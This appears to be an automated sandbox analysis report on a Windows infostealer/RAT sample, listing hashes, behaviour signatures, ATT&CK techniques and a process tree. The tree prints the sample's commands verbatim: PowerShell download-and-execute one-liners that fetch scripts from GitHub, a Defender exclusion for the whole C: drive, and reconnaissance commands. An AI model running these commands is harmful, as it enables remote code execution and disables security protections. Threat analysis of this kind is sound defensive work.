Analysis
-
max time kernel
149s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
-
submitted
28/09/2024, 16:27
General
-
Target
2024-09-28_8325addc1d627aeeac3fbbf5c4f91033_poet-rat_snatch.exe
-
Size
14.0MB
-
MD5
8325addc1d627aeeac3fbbf5c4f91033
-
SHA1
002f224b2663e4213687305c2deab2187cd3ddd8
-
SHA256
4f2da78c81c55d331bf46d7f48d91cf1f289ad56a01d91eb2000654bde8503b0
-
SHA512
6d2a06bb116b596006db750a5c7b354eddec43a2d8ad3d6d863d8088f675ae7c2302a6d6ade14d3ea6d7f83fe2e980cf500629e7cbfc84b4caccd265e9f2e5a8
-
SSDEEP
196608:tBhcxcjgzR5JKH6KbJLFfI6OB/zIf8ryQ5S:toxl54H6KbhFfpOlzIfxA
Malware Config
Signatures
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blocklisted process makes network request 2 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
-
Modifies Windows Firewall 2 TTPs 1 IoCs
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
-
Network Service Discovery 1 TTPs 1 IoCs
Attempt to gather information on host's network.
-
Browser Information Discovery 1 TTPs
Enumerate browser information.
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 9 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
-
Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
-
System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
-
System Network Connections Discovery 1 TTPs 1 IoCs
Attempt to get a listing of network connections.
-
Gathers network information 2 TTPs 3 IoCs
Uses commandline utility to view network configuration.
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 9 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of WriteProcessMemory 58 IoCs
-
Views/modifies file attributes 1 TTPs 1 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\2024-09-28_8325addc1d627aeeac3fbbf5c4f91033_poet-rat_snatch.exe"C:\Users\Admin\AppData\Local\Temp\2024-09-28_8325addc1d627aeeac3fbbf5c4f91033_poet-rat_snatch.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('https://raw.githubusercontent.com/EvilBytecode/ThunderKitty/main/powershellstuff/SysInfo.ps1')|iex"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\1r2y2azh\1r2y2azh.cmdline"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBCB8.tmp" "c:\Users\Admin\AppData\Local\Temp\1r2y2azh\CSCBC0074DB8DAC4611A5B6A2FC34CDFD.TMP"4⤵
-
-
-
C:\Windows\system32\netsh.exe"C:\Windows\system32\netsh.exe" wlan show profiles3⤵
- Event Triggered Execution: Netsh Helper DLL
- System Network Configuration Discovery: Wi-Fi Discovery
-
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup administrators3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup administrators4⤵
-
-
-
C:\Windows\system32\netsh.exe"C:\Windows\system32\netsh.exe" advfirewall show allprofiles3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Windows\system32\whoami.exe"C:\Windows\system32\whoami.exe" /all3⤵
-
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" user3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user4⤵
-
-
-
C:\Windows\system32\ipconfig.exe"C:\Windows\system32\ipconfig.exe" /displaydns3⤵
- Gathers network information
-
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup4⤵
-
-
-
C:\Windows\System32\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" startup get command caption3⤵
-
-
C:\Windows\system32\NETSTAT.EXE"C:\Windows\system32\NETSTAT.EXE" -ano3⤵
- System Network Connections Discovery
- Gathers network information
-
-
C:\Windows\System32\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName,productState,pathToSignedProductExe3⤵
-
-
C:\Windows\system32\ipconfig.exe"C:\Windows\system32\ipconfig.exe" /all3⤵
- Gathers network information
-
-
C:\Windows\system32\ROUTE.EXE"C:\Windows\system32\ROUTE.EXE" print3⤵
-
-
C:\Windows\system32\ARP.EXE"C:\Windows\system32\ARP.EXE" -a3⤵
- Network Service Discovery
-
-
C:\Windows\system32\netsh.exe"C:\Windows\system32\netsh.exe" wlan show profile3⤵
- Event Triggered Execution: Netsh Helper DLL
- System Network Configuration Discovery: Wi-Fi Discovery
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('https://raw.githubusercontent.com/EvilBytecode/ThunderKitty/main/powershellstuff/defenderstuff.ps1')|iex"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\lwssqd5x\lwssqd5x.cmdline"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBCB9.tmp" "c:\Users\Admin\AppData\Local\Temp\lwssqd5x\CSC1FAFC1239F094973A722A89F344DB6E0.TMP"4⤵
-
-
-
-
C:\Windows\system32\cmd.execmd.exe /c start facebook.com2⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -C "Add-MpPreference -ExclusionPath 'C:'"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exePowerShell -Command "(New-Object -ComObject SAPI.SpVoice).Speak(\"hey hey\")"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\cmd.execmd /c rundll32.exe user32.dll,SwapMouseButton2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\rundll32.exerundll32.exe user32.dll,SwapMouseButton3⤵
-
-
-
C:\Windows\system32\attrib.exeattrib +h +s C:\Users\Admin\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps12⤵
- Views/modifies file attributes
-
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x50c 0x4701⤵
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v15
Persistence
Account Manipulation
1Create or Modify System Process
1Windows Service
1Event Triggered Execution
1Netsh Helper DLL
1Privilege Escalation
Account Manipulation
1Create or Modify System Process
1Windows Service
1Event Triggered Execution
1Netsh Helper DLL
1Defense Evasion
Hide Artifacts
1Hidden Files and Directories
1Impair Defenses
1Disable or Modify System Firewall
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
2Credentials In Files
2Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
1KB
MD523aba7e7ecd37fd9f076dbd4d6e981e2
SHA140150b7db90f125b7b1c7cae65250f3a13a5bbb3
SHA256a67ce8b05ec37c76167b8769946b840cee681b0c3a19b8d7c56835ad21221b12
SHA512fce8455921832c8960e1aa783091b83fe17aa885b0a86e92d2ada35c76bfc79122d90b0260f6571018d7317ffee0c3bedc7f0bbf4d21a41e77d02e25892d3c9a
-
Filesize
1KB
MD595eb7f09542bb10bc00180cf990a7da7
SHA1512a6dbf17de372886fa01b3e36ff4132f3789dc
SHA2566d549e706c7511fba40ec9201532291b07bc089442fe581b403bf1ae06242516
SHA512cc6e39d23416c5d38e85718e7375834f149df316241a672325842815aafc383826c164dce42329f4da57799a77583b60f41f5f72f701e6ad292cf4ed78e1f22e
-
Filesize
1KB
MD5820128764c07552628e15dc57e1a2b89
SHA19613a355ee0f83dc8bc878997208feaaca245a14
SHA256d56c95e8d92341bbc8138e44205c5b8c4719e74e7bd0e5bb96a995b2b5f4c9f9
SHA5129dadd04db6371f855e316b995a76054f3062eeb9f78469ed52d9c7b140664c19c76230affc477e8e1ba8512e04ec656bf96cb294fa687470a8bffa519c4bef9d
-
Filesize
4KB
MD59fd8972bdc599e9bcede31ac59f515bd
SHA14ba0a8c99becab570a90bb54f7da56a9e5b611c5
SHA256b3b43bdb01b843d0b2d41b00628f5cf63c4e476544e4f5457b851466f807e6d3
SHA512e92c5feae63e68d1d5465ab3c81bf446e202d0980c8e2b3ab75dbe0508bd926538f64859f3d3bde7c09effd86e4725d281d0ef89215d30fccb5a64e9453caa03
-
Filesize
1KB
MD5a270d156c36282d39c142d314dfa4122
SHA1d2284fdc6df5616bb9ba05a6002b3034ac8ef6ff
SHA25695fba81d5b8027e56046ecfb7edb879530c7d597ac69d0e1d5abf0f43cf85304
SHA512c34d8505fd8487f93f498798e0c52b24f6892cfc39f19c0c11929abf4285a167fd902682655b4564b2f466ba8a4fc1b78b29907f7f3738ac95209015cf5c920d
-
Filesize
1KB
MD521245e98b2ecf283865a1aeb4a8c078a
SHA18b417f9e6c98ed0f9081476e4f01e1e1f58d4a0f
SHA25602df4c0ec02ef36d4bdcacfdefd718a83bb5027a3daca144ff7211fd5d7363eb
SHA51231a79efeab96af132197e2e15b9285a5b72bc138cc54db6f0a5023779f70cd448873a702dd8769604be1f6c5b68a105098ea48fdc98186e14f43e17e26e2abbd
-
Filesize
22KB
MD5babade175009ed938fb876a418917c16
SHA1d93d4c02623dd9442e9b8fbcc5454ad104b0db3a
SHA2568c210e30b68c5407e88b39b492b4a501bcff593564039e3829d7edcf8d744c8d
SHA512baf4aebc420140a566cd836c367089d0638cb9a6846590f3e9cbbb026d32acb01e0bc02bce943d93ba1e546acd0ebe7365fec0976c7f1c4f757bacfaf314fd39
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
4KB
MD58dec3d13e1500660ca44e0b782964a10
SHA11da2dfc82fe5d9487e293d26bfcbd4aeed9ebae4
SHA256dfbe9cbc4411e92045dec77e4f85da45256fee7ec976558ed98afdebb5c3e373
SHA51252c35968ccc58d02aff4f79e7b98e24a4c54fde86b9bb134c30fe09ef55d9348ae9c59ccaf1f8710aaeb154a90537a5b20dc757e872800e50f3bab96aad62e2b
-
Filesize
2KB
MD59758656bbe8589c66bb241b052490c72
SHA1b73da83fb3ae6b86c6365769a04de9845d5c602c
SHA256e4bfe191530cc53138c4a265755539f8a115f7828faba79dfac91f3184b26351
SHA512da9a8ecba8c2071e467f2d72fac524843fb0011c8486dd95e8b948b1c7f91bf02bcb80c20a01eddb6971b96db5ebde5f7c4c607e6b6d15e75d971ea104436e34
-
Filesize
1KB
MD58a1e7edb2117ec5dde9a07016905923b
SHA10155dbeeb16333e2eaa767b0209750efee56f47f
SHA256c379ac84c970f2055851b084c44575a5e4b5a70dc25f0acdd49aad306489b007
SHA5124ff0601803a006c661c962fe158cd5e9f40031d6b4fd7c5a05969a52d812e1fcb0aab20916fcad6c61c6d44cc7cfdf1e4f344f22ced937a0cd757ad841d3ab21
-
Filesize
369B
MD50776bc4dea5de86e11438cd8e0c7fc52
SHA1ed5ad937770bb19cc676096b3c6354dcbec03bc4
SHA25687e77e5b4ec7579962b799fec5236646e6a5bfde3b4880a36160c3b20b2bf461
SHA5129355a1f753c24db30dbebf47330d0f1b791b92976892030bf794216fe1bb1c18df7f164c964585451150735ec6ac0b5b19054bc0080b2dff9a58345b3636ad49
-
Filesize
652B
MD58ce68f00181b22d64ac3ad8cd83ad27b
SHA14d3780257d3c0202bb1480b599c3ffa96d011d2a
SHA256377539607f04e9eec5ccb1a33d46b384bb7af0965d83cc212f146a75d0b0b88a
SHA5126f8b21988d4cff72cec795b5e42913718de47b69a1f427aad73c519f35c07759de897bbd167a0bfabb741a975ef64ca98113ed73b48e2c4de5605dd461c34b9d
-
Filesize
652B
MD556da6c3378cc5e57791c5369ea19df59
SHA10557970f1a811253081996e0a77ac2bcc1231d7c
SHA25630538a1781cc93fc19be527f6d0b2603a5f6f46ce380e38e75ea8261d0901a92
SHA5128d046e72bf9fb8ad67abd156aac5f8f74b28c7bd5bfdc9f941bb6a49dbb32c11c2d46a1526f6625fab2611982e9567c8ff8a9ba70db4e407fb9befdcca92218e
-
Filesize
369B
MD5bd43763b4f912dbbcff99c59e8c4a338
SHA166d9632ac2d8adcb40c0edb5554b1c3689d05e53
SHA256b178e0ed4910461c0695f0115f068fd160df79b4255420759ed2361a250e22eb
SHA512a0bd44dd88b726af6c4ace5c645b85aae771c6e3713c3c122c94842e71b3be25e32547aee2ff3dd6522724a83ab76f68222e6a9838ce92b6025322e4e97971f1
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
32KB
-
Filesize
40KB
-
Filesize
7.6MB
-
Filesize
72KB
-
Filesize
144KB
-
Filesize
168KB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
32KB
-
Filesize
8KB
-
Filesize
136KB
-
Filesize
10.8MB